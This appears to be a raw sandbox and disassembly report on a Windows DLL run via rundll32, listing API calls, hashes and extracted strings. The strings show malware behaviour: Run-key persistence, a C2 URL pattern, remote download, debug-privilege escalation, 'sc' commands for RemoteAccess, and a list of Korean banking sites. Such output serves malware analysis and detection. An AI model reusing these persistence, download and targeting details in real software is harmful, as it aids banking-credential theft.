                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CreateProcesswsprintf$CloseFileHandleOpenTokenstrncpy$AdjustCurrentDirectoryInfoLookupPrivilegePrivilegesSystemThreadValueWritesscanfstrchrstrrchr
                                                • String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
                                                • API String ID: 3642037362-1421401311
                                                • Opcode ID: 959fb8fba947e54388e467c1008752361763f84d015db73d1a953f87127b373f
                                                • Instruction ID: 4b2977ad490d08696dca791de939d207079566f8b39031e4ddb8eae90f5a8ad1
                                                • Opcode Fuzzy Hash: 959fb8fba947e54388e467c1008752361763f84d015db73d1a953f87127b373f
                                                • Instruction Fuzzy Hash: FA31BF71504344BBE321CBA8CD84AEBBB9AEB8D340F40492DF25597242DB35E944CB63
                                                APIs
                                                • LoadLibraryA.KERNEL32(?), ref: 10011AFC
                                                • GetLastError.KERNEL32 ref: 10011B08
                                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 10011B3B
                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10011B4D
                                                • LocalAlloc.KERNEL32(00000040,00000008), ref: 10011B61
                                                • FreeLibrary.KERNEL32(00000000), ref: 10011B7E
                                                • GetProcAddress.KERNEL32(?,?), ref: 10011BDF
                                                • GetLastError.KERNEL32 ref: 10011BEB
                                                • RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 10011C1D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ErrorExceptionLastLibraryRaise$AddressAllocExchangeFreeInterlockedLoadLocalProc
                                                • String ID: $
                                                • API String ID: 991255547-3993045852
                                                • Opcode ID: a73b7cc8c625f911e0734331049b328756f35cc78c5a687038707bc00ce3fec9
                                                • Instruction ID: a354a1ddeb452cab2ad2ab051f5ed65d06ba3f599703faf405cad435a4b3e081
                                                • Opcode Fuzzy Hash: a73b7cc8c625f911e0734331049b328756f35cc78c5a687038707bc00ce3fec9
                                                • Instruction Fuzzy Hash: BA612DB5A0420A9FEB19CF99C8C1AEA77F5EB48350F11812DE905DB251E770EE84CB60
                                                APIs
                                                  • Part of subcall function 100075F0: strstr.MSVCRT ref: 1000769B
                                                  • Part of subcall function 100075F0: strstr.MSVCRT ref: 100076BF
                                                  • Part of subcall function 100075F0: strcspn.MSVCRT ref: 100076CE
                                                  • Part of subcall function 100075F0: strstr.MSVCRT ref: 100076DA
                                                  • Part of subcall function 100075F0: strcspn.MSVCRT ref: 100076E9
                                                  • Part of subcall function 100075F0: strncpy.MSVCRT ref: 100076F2
                                                  • Part of subcall function 100075F0: strstr.MSVCRT ref: 1000772F
                                                  • Part of subcall function 100075F0: strcspn.MSVCRT ref: 10007742
                                                  • Part of subcall function 10006B90: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 10006BA7
                                                  • Part of subcall function 10006F20: RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,?), ref: 10006F4F
                                                  • Part of subcall function 10006F20: GlobalMemoryStatusEx.KERNEL32(?), ref: 10007009
                                                  • Part of subcall function 10006F20: GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?), ref: 10007062
                                                • send.WS2_32(00000000,?,00000128,00000000), ref: 10008ADF
                                                • closesocket.WS2_32(00000000), ref: 10008AEB
                                                • select.WS2_32 ref: 10008B41
                                                • closesocket.WS2_32(00000000), ref: 10008C33
                                                • InterlockedExchange.KERNEL32(1001B6A0,00000001), ref: 10008C44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: strstr$strcspn$closesocket$DefaultExchangeGlobalInterlockedLanguageMemoryOpenStatusSystemselectsendsetsockoptstrncpy
                                                • String ID: SeShutdownPrivilege$zip
                                                • API String ID: 619725691-4289258210
                                                • Opcode ID: b5eb4e8b9dd09d5d0053c07554e98b6b0746b7bdf66f2196c35ecf5b0e9c48ff
                                                • Instruction ID: 7a5603a2a2216d2e1622d78d4c03b43238dfd1876f0237c8316e7908159126a5
                                                • Opcode Fuzzy Hash: b5eb4e8b9dd09d5d0053c07554e98b6b0746b7bdf66f2196c35ecf5b0e9c48ff
                                                • Instruction Fuzzy Hash: 0551D6B1544305AAF320DB648C85FEB76E9FB843D0F104929FA49D91C6EB74E644CBB2
                                                APIs
                                                • LoadLibraryA.KERNEL32(urlmon.dll,00000001,00000001,?), ref: 10007267
                                                • LoadLibraryA.KERNEL32(wininet.dll), ref: 10007270
                                                • GetProcAddress.KERNEL32(00000000,URLDownloadToCacheFileA), ref: 10007299
                                                • GetProcAddress.KERNEL32(00000000,GetUrlCacheEntryInfoA), ref: 100072A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
                                                • API String ID: 2574300362-1569318151
                                                • Opcode ID: 04083978eb23d12a34f0fee697af90656df796dc382c12a5cf3d9f7be74f32bc
                                                • Instruction ID: c0467908c50afa1d83c3b06bf8344a948e458b4db3363e6c89df874e13e7bd38
                                                • Opcode Fuzzy Hash: 04083978eb23d12a34f0fee697af90656df796dc382c12a5cf3d9f7be74f32bc
                                                • Instruction Fuzzy Hash: CC41CC31A0051C6BDB25C6B8CC51BEF7666FB88320F550369F716AB2C1DAF15E45CB44
                                                APIs
                                                  • Part of subcall function 10004F60: GetCurrentProcess.KERNEL32(00000028,00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F6A
                                                  • Part of subcall function 10004F60: OpenProcessToken.ADVAPI32(00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F71
                                                  • Part of subcall function 10004F60: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10004F87
                                                  • Part of subcall function 10004F60: AdjustTokenPrivileges.KERNELBASE ref: 10004FCA
                                                  • Part of subcall function 10004F60: CloseHandle.KERNEL32 ref: 10004FD5
                                                • CreateMutexA.KERNEL32(00000000,00000001,Global\98012trt8-d8dfsf,?,100084BC), ref: 1000845B
                                                • GetLastError.KERNEL32(?,100084BC), ref: 10008463
                                                • ReleaseMutex.KERNEL32(00000000,?,?,?,100084BC), ref: 1000848D
                                                • CloseHandle.KERNEL32(00000000,?,?,?,100084BC), ref: 10008494
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseHandleMutexProcessToken$AdjustCreateCurrentErrorLastLookupOpenPrivilegePrivilegesReleaseValue
                                                • String ID: ERROR_ALREADY_EXISTS$Global\98012trt8-d8dfsf$SeDebugPrivilege$c:\11.txt
                                                • API String ID: 3631164735-4205529783
                                                • Opcode ID: 371d1544536f455d4ff2881a43cd085a9ecfe5f63921b749fa4ab69506bf8e29
                                                • Instruction ID: 925e2da293242ab0c133c8592058369d05a2f9f499b66df2af7b6b931c45f916
                                                • Opcode Fuzzy Hash: 371d1544536f455d4ff2881a43cd085a9ecfe5f63921b749fa4ab69506bf8e29
                                                • Instruction Fuzzy Hash: 42E09275D10060A3F912B760ACCDADE3A21D78A795F074130F709E5156DF34CAD182B2
                                                APIs
                                                • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FEC7,?), ref: 1000F87E
                                                • GetFileSize.KERNEL32(?,00000000,?,00000000,?), ref: 1000F8EB
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FEC7), ref: 1000F90B
                                                • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 1000F922
                                                • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FEC7), ref: 1000F92B
                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F93C
                                                • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 1000F95C
                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F96D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: File$PointerRead$HandleInformationSize
                                                • String ID:
                                                • API String ID: 2979504256-0
                                                • Opcode ID: 859882acb2849d7037477cc4baac1a315585c36ddf65a2636b61d75e7ae6334e
                                                • Instruction ID: 75170083ee676786804825bfb6193be50822de76c0b42b9061a3e677b9cbe5b9
                                                • Opcode Fuzzy Hash: 859882acb2849d7037477cc4baac1a315585c36ddf65a2636b61d75e7ae6334e
                                                • Instruction Fuzzy Hash: C851BFB1A04305AFF314CE94CC81FBBB7E4EF88784F10891CF68597684EAB4E9059B56
                                                APIs
                                                • InterlockedDecrement.KERNEL32(?), ref: 1000A8E4
                                                • 6CEE2C70.MFC42(?), ref: 1000A8FA
                                                • InterlockedDecrement.KERNEL32(?), ref: 1000A918
                                                • 6CEE2C70.MFC42(?), ref: 1000A92E
                                                • InterlockedIncrement.KERNEL32(?), ref: 1000A965
                                                • InterlockedDecrement.KERNEL32(?), ref: 1000A977
                                                • 6CEE2C70.MFC42(?,?,?,?,?,?,?,0000000C), ref: 1000A99A
                                                • 6CEE2C70.MFC42(?,?,?,?,?,?,?,0000000C), ref: 1000A9A3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Interlocked$Decrement$Increment
                                                • String ID:
                                                • API String ID: 2574743344-0
                                                • Opcode ID: c26f0b026ed7cb081274be26cba3a652331b1fc049732353bcbaeeb4cd700175
                                                • Instruction ID: 3093974cb4f3d434be5fdbb974d372fcb86c240b2bae65a57b53355a280814b6
                                                • Opcode Fuzzy Hash: c26f0b026ed7cb081274be26cba3a652331b1fc049732353bcbaeeb4cd700175
                                                • Instruction Fuzzy Hash: BE51B0B2A043529BE710DF658885A0EB7E4FB85690F424A2DF485D7205D734EDC5CB92
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: strstr
                                                • String ID: %s/joy.asp?sid=%s$%s|NULL|%s|%s$09121307$ECF4BBEA1588$NULL$http://
                                                • API String ID: 1392478783-2150159293
                                                • Opcode ID: a49b259e51406aef14fd146218e1fac6b9de25d8a0ef98e8ef8312d6623e819d
                                                • Instruction ID: ecfe1f19982070fc907945bea6b76d3382d22d52cdee0c44685c771b8a3fb10f
                                                • Opcode Fuzzy Hash: a49b259e51406aef14fd146218e1fac6b9de25d8a0ef98e8ef8312d6623e819d
                                                • Instruction Fuzzy Hash: 91318F756047416BE724CB78CC01BEBB6D5EBC8344F44893CB74A8A285EF78E544C752
                                                APIs
                                                  • Part of subcall function 10004B10: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004B1F
                                                  • Part of subcall function 10004C20: RegCreateKeyExA.KERNEL32(?,?,?,?,?,?,?,?,?,1000906E,80000001,00000000,?), ref: 10004C4D
                                                • wsprintfA.USER32 ref: 10009097
                                                  • Part of subcall function 10004CC0: RegSetValueExA.KERNEL32(?,?,?,?,?,?,100090C2,?,EvtMgr,00000000,00000001,?), ref: 10004CDE
                                                  • Part of subcall function 10004C60: RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,74DF0F00), ref: 10004C65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Similarity
                                                • API ID: CloseCreateNamePathShortValuewsprintf
                                                • String ID: %s "%s",init$EvtMgr$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$c:\agtve\yhnvs.dll$c:\windows\SysWOW64\rundll32.exe
                                                • API String ID: 2251888957-1761549480
                                                • Opcode ID: 33cebf139591f84ff6b25fec94bbcb491949b6952fbd0d975d4c5d77bffff605
                                                • Instruction ID: 555e9edd79d20669cd6279b5f68c84e268027a48e8a655114ccd52f9ce3fa163
                                                • Opcode Fuzzy Hash: 33cebf139591f84ff6b25fec94bbcb491949b6952fbd0d975d4c5d77bffff605
                                                • Instruction Fuzzy Hash: EF11ECB56442447BF354C228DC42FEB7698EB84340F800D28B745AA182EBF5E68882A7
                                                APIs
                                                • _CxxThrowException.MSVCRT ref: 10007F95
                                                • _CxxThrowException.MSVCRT(?,100147E8), ref: 10007FCD
                                                • lstrlen.KERNEL32(?,?,?,?,?,?), ref: 10007FF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: ExceptionThrow$lstrlen
                                                • String ID: DLLPath$mp3
                                                • API String ID: 3990665486-261125002
                                                • Opcode ID: 67fd9a1bfb3afa75ed2ed496ef011eb696334ff097cec00f352b52343f7cfdca
                                                • Instruction ID: 8c7f6d5efa12be28a40149e6bde7b072a113c2a48185607467365fb246139210
                                                • Opcode Fuzzy Hash: 67fd9a1bfb3afa75ed2ed496ef011eb696334ff097cec00f352b52343f7cfdca
                                                • Instruction Fuzzy Hash: CB019EB590015AAFDB00CF90CC84DFEB7BCFF88250F408159F205AA140DB79DE818B21
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: Close
                                                • String ID: DLLPath$net start RemoteAccess$sc config RemoteAccess start= auto$sc stop RemoteAccess
                                                • API String ID: 3535843008-2096816188
                                                • Opcode ID: 889d507d1f066a83a2383269c5cb2da371953c18f4bf873c46dcd3b7511ecae1
                                                • Instruction ID: f1805eb3d9b1d902160f785e8ff9d521c1139f98b36d7c23839a3f3e2841c964
                                                • Opcode Fuzzy Hash: 889d507d1f066a83a2383269c5cb2da371953c18f4bf873c46dcd3b7511ecae1
                                                • Instruction Fuzzy Hash: 82E04F75D55128ABE610EF999C85EEB7FACEF442A4F008156F6086A242CB359C50CAF2
                                                APIs
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,75BF8400,00000000,10010D59), ref: 1000FA95
                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,75BF8400,00000000,10010D59), ref: 1000FAD6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: File$CreatePointer
                                                • String ID:
                                                • API String ID: 2024441833-0
                                                • Opcode ID: b3b746043fca136ba4e81b91f0f512960f4c623e21c03b3bed80360a50ba42b1
                                                • Instruction ID: 308ac7dc05e7744f4e081a0bdb9278c18c1066b528d8c71e9578729df1ac5f0e
                                                • Opcode Fuzzy Hash: b3b746043fca136ba4e81b91f0f512960f4c623e21c03b3bed80360a50ba42b1
                                                • Instruction Fuzzy Hash: ED416AB26057419FE320CF29D884B5BB7ECEB943A9F108A3FF295C6940D370D8959B60
                                                APIs
                                                • VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 1000663D
                                                • 6CEE2C70.MFC42(00000000), ref: 1000666E
                                                • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 10006697
                                                • 6CEE2C70.MFC42(00000000), ref: 100066E2
                                                • CloseHandle.KERNEL32(00000000), ref: 100066F1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: CloseHandleMemoryProcessQueryReadVirtual
                                                • String ID:
                                                • API String ID: 1621033003-0
                                                • Opcode ID: ce3c6dad6738674a56033ed313a0acf1917c8ebe045c92598b6288b6f3b7be5a
                                                • Instruction ID: 86ba632d18ad3737237f260a16107ce2d7cf70f613dcfd362d55f89863a9b285
                                                • Opcode Fuzzy Hash: ce3c6dad6738674a56033ed313a0acf1917c8ebe045c92598b6288b6f3b7be5a
                                                • Instruction Fuzzy Hash: DB31BE717043529BE710CF14CC81A2BB3EAFB8A394F10852DF9809B245DB71ED46CB92
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 88411d57cb3e3dbeacca650520ba2354405dbfd77ca187300c3dbeb98fc05c50
                                                • Instruction ID: bb61c64e4c2e60018887cf4b21b2b77a56d021ed7f9f06e12eb8ae260fd69302
                                                • Opcode Fuzzy Hash: 88411d57cb3e3dbeacca650520ba2354405dbfd77ca187300c3dbeb98fc05c50
                                                • Instruction Fuzzy Hash: B90140F5B102158BEB60DF199982B0772E8FF08254F44447AF986CFA05EBB5F884CB52
                                                APIs
                                                • InterlockedDecrement.KERNEL32(00000008), ref: 1000A18B
                                                • 6CEE2C70.MFC42(?,?,?,ROOT\CIMV2), ref: 1000A1AE
                                                • 6CEE2C70.MFC42(00000000,?,?,ROOT\CIMV2), ref: 1000A1B7
                                                Strings
                                                • Win32_NetworkAdapterConfiguration, xrefs: 1000A08B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: DecrementInterlocked
                                                • String ID: Win32_NetworkAdapterConfiguration
                                                • API String ID: 3448037634-4052814535
                                                • Opcode ID: dcbc64a1a200627460223833506d59ae0a485873ca728d9a28a1fc0d324c7d81
                                                • Instruction ID: 49a93a9e5889f4a4d7e19c6da1a56bba55ab2360c9dac4e16cdcecec2b112754
                                                • Opcode Fuzzy Hash: dcbc64a1a200627460223833506d59ae0a485873ca728d9a28a1fc0d324c7d81
                                                • Instruction Fuzzy Hash: 1541C271A006158FE720DF18C88099AF3E6FB86684F248B19F855DB618E775EDC5CB81
                                                APIs
                                                • InterlockedDecrement.KERNEL32(00000008), ref: 1000A20E
                                                • 6CEE2C70.MFC42(?), ref: 1000A231
                                                • 6CEE2C70.MFC42(00000000), ref: 1000A23A
                                                Strings
                                                • Win32_NetworkAdapterConfiguration, xrefs: 1000A201
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: DecrementInterlocked
                                                • String ID: Win32_NetworkAdapterConfiguration
                                                • API String ID: 3448037634-4052814535
                                                • Opcode ID: a83a43c36c2ad791abc108df72a98b97aa1142c5a07bb070410fceaf22dd0828
                                                • Instruction ID: c28a89dc488e9a731896744f18f44f90fe9456c4448bec02802ad89f904d7290
                                                • Opcode Fuzzy Hash: a83a43c36c2ad791abc108df72a98b97aa1142c5a07bb070410fceaf22dd0828
                                                • Instruction Fuzzy Hash: 5FF065B6A0122157F660CF29AC45B4773DCEF46AE0B024539FC45DB208E775EDC1CA90
                                                APIs
                                                Strings
                                                • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 10006211
                                                • , xrefs: 10006294
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: strchr
                                                • String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
                                                • API String ID: 2830005266-1486078621
                                                • Opcode ID: 55542ce2e377251f9c8c239b7a9facd4ffdda20855bf5b2e39e9588a7081b524
                                                • Instruction ID: 22f4c21b83fa130e3717f09086c4acdffd80da0c0eff8554752984f014423e24
                                                • Opcode Fuzzy Hash: 55542ce2e377251f9c8c239b7a9facd4ffdda20855bf5b2e39e9588a7081b524
                                                • Instruction Fuzzy Hash: 9431A136604A081B972CC978985566B7AC3FBC4270FA5073DFA6B872C0DEF59E488281
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 024ebd3cf16b86b7db05172b19d3300478f962b870689d7c92be1f1a324c671d
                                                • Instruction ID: 76e20ac30a4a5d55d19c4aae950d6c9da367577159c72b0c1becef77eded0a0e
                                                • Opcode Fuzzy Hash: 024ebd3cf16b86b7db05172b19d3300478f962b870689d7c92be1f1a324c671d
                                                • Instruction Fuzzy Hash: 5441C6F5A043489FCB64CF69988155ABBD0FB48220F94863EF9998B741D7B4E984CB42
                                                APIs
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,00000000), ref: 1000FEA9
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1000FED6
                                                • GetLocalTime.KERNEL32(?), ref: 1000FF10
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 1000FF20
                                                  • Part of subcall function 1000F870: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FEC7,?), ref: 1000F87E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                • String ID:
                                                • API String ID: 3986731826-0
                                                • Opcode ID: d76752544ed911a59727a7edf19554d459005f1b391c5dc4058420ad9c283b3b
                                                • Instruction ID: ff97dbb23fa899d1f5120cfb08b873e3bb9ee6e36dd1778d440c9f7421c03229
                                                • Opcode Fuzzy Hash: d76752544ed911a59727a7edf19554d459005f1b391c5dc4058420ad9c283b3b
                                                • Instruction Fuzzy Hash: A54182B1504B459FE310DF29C88096BF7E8FF89354F408A2EF59A83A51D771E909CB61
                                                APIs
                                                • wcslen.MSVCRT ref: 10011738
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000002,00000000,00000000,?,?,00000000,00000000,10005F05,00000000), ref: 10011764
                                                • GetLastError.KERNEL32 ref: 10011774
                                                • GetLastError.KERNEL32 ref: 1001177A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: ErrorLast$ByteCharMultiWidewcslen
                                                • String ID:
                                                • API String ID: 4237787585-0
                                                • Opcode ID: f25346144e8588a17020577504c641a423692082a0a8ff6178c4d9976cd073da
                                                • Instruction ID: a60b9fdcdbd7bba2f34e03c5dbd801d92a7e0330a45912f01037cd33475d2502
                                                • Opcode Fuzzy Hash: f25346144e8588a17020577504c641a423692082a0a8ff6178c4d9976cd073da
                                                • Instruction Fuzzy Hash: 02F0227620815ABDE224E6764C88DAB77ECDB852F87124638F514DE2C2E834EC81C2B0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e57b5a74ef33a4f8e7c02b94979bb301ef9140516089241c3c50ce787c9cd0f2
                                                • Instruction ID: 31ee9fb48a3bb8c59739104f7274127136238450a65740f9f2d1a36a531c8075
